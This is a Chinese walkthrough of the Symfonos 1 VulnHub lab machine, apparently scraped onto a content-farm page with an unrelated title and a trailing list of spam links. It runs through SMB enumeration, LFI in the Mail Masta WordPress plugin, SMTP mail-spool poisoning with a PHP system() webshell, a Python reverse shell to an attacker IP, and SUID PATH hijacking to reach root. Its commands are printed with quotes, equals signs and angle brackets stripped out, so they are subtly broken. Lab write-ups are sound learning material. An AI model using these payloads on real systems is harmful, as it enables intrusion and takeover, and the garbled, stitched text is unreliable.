当前位置: 首页 > news >正文

网站首页的图标是怎么做的怎么才能注册做网站

网站首页的图标是怎么做的,怎么才能注册做网站,商业空间设计方案,福建seo希望和各位大佬一起学习#xff0c;如果文章内容有错请多多指正#xff0c;谢谢#xff01; 个人博客链接#xff1a;CH4SER的个人BLOG – Welcome To Ch4sers Blog Symfonos 靶机下载地址#xff1a;https://www.vulnhub.com/entry/symfonos-1,322/ 0x01 信息收集 …希望和各位大佬一起学习如果文章内容有错请多多指正谢谢   个人博客链接CH4SER的个人BLOG – Welcome To Ch4sers Blog Symfonos 靶机下载地址https://www.vulnhub.com/entry/symfonos-1,322/ 0x01 信息收集 Nmap扫描目标主机发现开放22、25、80、139、445端口分别运行ssh、smtp、http、smb服务。 ┌──(root㉿ch4ser)-[~] └─# nmap -p- -sV -sC -A 192.168.196.141 Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-17 08:15 CST Nmap scan report for 192.168.196.141 Host is up (0.00034s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA) | 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA) |_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 | ssl-cert: Subject: commonNamesymfonos | Subject Alternative Name: DNS:symfonos | Not valid before: 2019-06-29T00:29:42 |_Not valid after: 2029-06-26T00:29:42 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesnt have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open ᴮsՕ Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) MAC Address: 00:0C:29:AA:38:6B (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel 尝试DirSearch扫描80端口网站目录没有扫出来有价值的信息。 由于目标主机开放smb服务尝试使用smbclient连接成功列出目标主机上的共享文件夹列表。 其中Sharename为共享文件夹的名称print$为打印机驱动程序的共享文件夹helios为用户helios个人共享文件夹anonymous为匿名共享文件夹IPC$为IPC服务的共享文件夹。 ┌──(root?ch4ser)-[~] └─# smbclient -L 192.168.196.141 Password for [WORKGROUP\root]:Sharename Type Comment--------- ---- -------print$ Disk Printer Drivershelios Disk Helios personal shareanonymous Disk IPC$ IPC IPC Service (Samba 4.5.16-Debian) Reconnecting with SMB1 for workgroup listing.Server Comment--------- -------Workgroup Master--------- -------WORKGROUP SYMFONOS尝试连接到anonymous匿名共享文件夹因为一般来说anonymous不需要身份认证。 发现attention.txt将其下载到本地并查看其内容为Zeus叫员工停止使用epidioko, qwerty, baseball这三个密码被他发现就要炒鱿鱼了那看来Zeus应该是个老板哈哈哈。 ┌──(root㉿ch4ser)-[~] └─# smbclient //192.168.196.141/anonymous Password for [WORKGROUP\root]: Try help to get a list of possible commands. smb: \ ls. D 0 Sat Jun 29 09:14:49 2019.. D 0 Sat Jun 29 09:12:15 2019attention.txt N 154 Sat Jun 29 09:14:49 201919994224 blocks of size 1024. 17305336 blocks available smb: \ get attention.txt getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec) smb: \ exit┌──(root㉿ch4ser)-[~] └─# cat attention.txt Can users please stop using passwords like epidioko, qwerty and baseball! Next person I find using one of these passwords will be fired!-Zeus尝试连接用户helios个人共享文件夹指定用户名为helios使用epidioko, qwerty, baseball这三个密码进行身份认证其中qwerty为正确密码。 todo.txt内容表明该用户要在/h3l105上工作由此猜测/h3l105可能为某网站目录。 ┌──(root㉿ch4ser)-[~] └─# smbclient //192.168.196.141/helios -U helios Password for [WORKGROUP\helios]: Try help to get a list of possible commands. smb: \ ls. D 0 Sat Jun 29 08:32:05 2019.. D 0 Sat Jun 29 08:37:04 2019research.txt A 432 Sat Jun 29 08:32:05 2019todo.txt A 52 Sat Jun 29 08:32:05 201919994224 blocks of size 1024. 17305336 blocks available smb: \ get research.txt getting file \research.txt of size 432 as research.txt (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec) smb: \ get todo.txt getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 118.2 KiloBytes/sec) smb: \ exit┌──(root㉿ch4ser)-[~] └─# cat research.txt Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.┌──(root㉿ch4ser)-[~] └─# cat todo.txt 1. Binge watch Dexter 2. Dance 3. Work on /h3l105访问/h3l105发现是一个WordPress网站Wappalyzer显示WordPress版本为5.2.2 0x02 权限获取 - WordPress任意文件包含 使用wpscan扫描该WordPress站点发现其mail-masta版本为1.0可能存在漏洞利用。 wpscan项目地址https://github.com/wpscanteam/wpscan wpscan ┌──(root㉿ch4ser)-[~] └─# wpscan --url http://192.168.196.141/h3l105/ --plugins-detection aggressive ............ [] mail-masta| Location: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/| Latest Version: 1.0 (up to date)| Last Updated: 2014-09-19T07:52:00.000Z| Readme: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)| - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/, status: 200|| Version: 1.0 (80% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)| - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt使用searchsploit搜索mail-masta相关漏洞利用代码并查看得知poc为 http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd ┌──(root㉿ch4ser)-[~] └─# searchsploit masta --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2) | php/webapps/50226.py WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results┌──(root㉿ch4ser)-[~] └─# find / -name 40290.txt /root/40290.txt /usr/share/exploitdb/exploits/php/webapps/40290.txt┌──(root㉿ch4ser)-[~] └─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt [] Date: [23-8-2016] [] Autor Guillermo Garcia Marcos [] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip [] Title: Mail Masta WP Local File Inclusion [] info: Local File InclusionThe File Inclusion vulnerability allows an attacker to include a file, usually exploiting a dynamic file inclusion mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.Source: /inc/campaign/count_of_send.php Line 4: include($_GET[pl]);Source: /inc/lists/csvexport.php: Line 5: include($_GET[pl]);Source: /inc/campaign/count_of_send.php Line 4: include($_GET[pl]);Source: /inc/lists/csvexport.php Line 5: include($_GET[pl]);Source: /inc/campaign/count_of_send.php Line 4: include($_GET[pl]);This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.Typical proof-of-concept would be to load passwd file:http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd 页面成功返回相关内容即此处存在任意文件包含。 继续尝试包含webshell由于没有找到文件上传点一般思路是进行日志包含即访问路径带有一句话木马写入日志然后包含。 这里不采用这种方式因为前面信息收集发现目标主机开放smtp邮件服务所以想到可以给用户helios发送邮件然后包含其默认邮件路径/var/mail/helios。 ┌──(root㉿ch4ser)-[~] └─# telnet 192.168.196.141 25 Trying 192.168.196.141... Connected to 192.168.196.141. Escape character is ^]. 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) MAIL FROM: Ch4ser RCPT TO: helios data ?php system($_GET[shell]); ? . QUIT250 2.1.0 Ok 250 2.1.5 Ok 354 End data with CRLF.CRLF 250 2.0.0 Ok: queued as C4C0840698221 2.0.0 Bye Connection closed by foreign host.访问以下路径发现刚才的邮件已经写进去了这里没有webshell代码是正常的说明被执行了。 /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/var/mail/helios 那么现在只需要反弹shell即可得到会话但我测试bash反弹不回来python则可以。 反弹shell在线生成网站https://forum.ywhack.com/shell.php 192.168.196.141/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/var/mail/heliosshellpython -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.196.128,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]); 成功得到普通用户helios的权限。 ┌──(root㉿ch4ser)-[~] └─# nc -lvvp 7777 listening on [any] 7777 ... 192.168.196.141: inverse host lookup failed: Unknown host connect to [192.168.196.128] from (UNKNOWN) [192.168.196.141] 52208 /bin/sh: 0: cant access tty; job control turned off $ whoami helios $ id uid1000(helios) gid1000(helios) groups1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)0x03 权限提升 - SUID环境变量 查找SUID文件发现/opt/statuscheck可能可以利用但具体还是要看其能否执行命令。 $ python -c import pty;pty.spawn(/bin/bash) h3l105/wp-content/plugins/mail-masta/inc/campaign$ find / -perm -us -type f 2/dev/null inc/campaign$ find / -perm -us -type f 2/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /opt/statuscheck /bin/mount /bin/umount /bin/su /bin/ping使用命令strings大概看一下/opt/statuscheck干了些什么发现它会执行curl命令。 h3l105/wp-content/plugins/mail-masta/inc/campaign$ strings /opt/statuscheck ........... curl -I H ........... 来到/tmp目录新建一个名为curl的文件让其执行/bin/bash并将/tmp导入环境变量。 h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /tmp cd /tmp heliossymfonos:/tmp$ echo /bin/sh curl echo /bin/sh curl heliossymfonos:/tmp$ chmod 777 curl chmod 777 curl heliossymfonos:/tmp$ export PATH/tmp:$PATH export PATH/tmp:$PATH heliossymfonos:/tmp$ echo $PATH echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin执行/opt/statuscheck由于其享有SUID权限会以root身份执行我们的curl而它会执行/bin/bash最后成功拿下root权限和flag。 heliossymfonos:/tmp$ /opt/statuscheck /opt/statuscheck # whoami whoami root # id id uid1000(helios) gid1000(helios) euid0(root) groups1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) # cd /root cd /root # ls ls proof.txt # cat proof.txt cat proof.txtCongrats on rooting symfonos:1!\ __ --/[})))*/ \ ,|\\ //| ,|\ \ //,/ -~ |) _-~~~\ |/ / || _-~ / ,(( / ) | \ / // _-~ _/_-~|((( ; / )/ / _ -~ _-~ ,/) )) ~~\ \\//| __--~~__--\ _-~ _/, ((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /((\~\ | ) | / __--~~ \-~~ _-~\(\ __--( _/ |\ / --~~ __--~ _-~ ~|( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~ ~~\~~~~~~ \-~ \~\ / __--~~~~~/;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._;;;;;;;; / ---~~~/_.-----.-~ _.._ ~\ ;;;;;;; / ----~~/ \,~ \ \ ;;;; ( ---~~/ :::| \\. | _ ----~~~~ / :| ()))), ______/\/~ | / / (((((()) /~;;.____/;; / ___.---( ;;;/ )))))/ // _;______;------~~~~~ |;;/\ / (( ( // \ \ / | \;;,\ (_ \ \ /,/----- _ \_| \\_ //~;~~~~~~~~~ \_| (,~~ \~\~~Contact me via Twitter zayotic to give feedback!
http://www.pierceye.com/news/310689/

相关文章:

  • 乌海市网站建设基于asp的网络课程网站开发
  • 关掉自己做的网站网页设计与制作服务公司
  • 视频相亲网站开发成本分类信息网站推广的意义
  • 域名和网站网站开发项目视频
  • 色流网站怎么做东营建筑信息网
  • 做能支付的网站贵吗网络安全工程师考证
  • 下载类网站开发条件环球资源网成立时间
  • 客户如何找到做网站宣传的律师免费虚拟主机空间
  • 点击网站出现微信二维码的链接怎么做网架制造厂
  • 服装网站建设环境分析一家专门做房产特卖的网站
  • 网站推广方式方法品牌建设的阶段和步骤是什么
  • 游戏开发平台seo的定义
  • 北京住房和城乡建设部网站官网可信赖的购物网站建设
  • 网站百度一直没有收录热狗网站关键词优化
  • 视频网站开发价格本地app开发公司电话
  • 网站设计风格介绍北京市建设工程信息网如何登录
  • 怎么创建一个属于自己的网站怎么制作做网站
  • 大学加强网站建设与管理的通知莱芜金点子租房信息港
  • 网站的营销与推广杭州五旋科技网站建设怎么样
  • 莱芜四中网站如何优化网站目录结构
  • 深圳公司网站设计哪家好北京装修公司十大排名
  • 如何制作一个好网站做国际网站找阿里
  • 南京制作网站wordpress网站源码上传
  • 做装修效果图的网站有哪些软件泉州营销型网站设计
  • 让路由器做网站服务器一级建造师价格最新行情
  • 白沟做网站wordpress批量编辑
  • 网站充值支付宝收款怎么做天元建设集团有限公司第七建筑工程公司
  • 定制家具网站源代码海口本地网站
  • 公司网站建设平台公司做网站开发流程
  • wordpress网站怎么打开很慢劳务派遣和外包一样吗